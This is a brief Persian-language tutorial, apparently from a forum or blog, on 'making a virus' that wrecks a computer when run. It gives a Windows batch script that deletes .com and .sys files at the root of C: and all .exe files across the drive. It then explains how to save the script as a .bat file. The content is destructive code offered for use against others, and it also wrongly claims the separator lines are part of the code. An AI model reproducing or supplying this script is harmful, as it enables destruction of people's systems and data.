آموزش ساخت ویروس : این ویروس در صورت اجرا کامپیوتر فرد را خراب میکند طرز ساخت: note pad خود را باز کرده و کد پاین

 


@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s

===========
رادر آن کپی و پست کنید بعد به منوی فایل رفته وسیو از را انتخواب کنید ودر قسمت filename اسم مورد نظر را نوشته و با پسوند .bat ذخیره کنید مثل xxx.bat توجه (( خط فاصله ها هم جزو کد هستند ))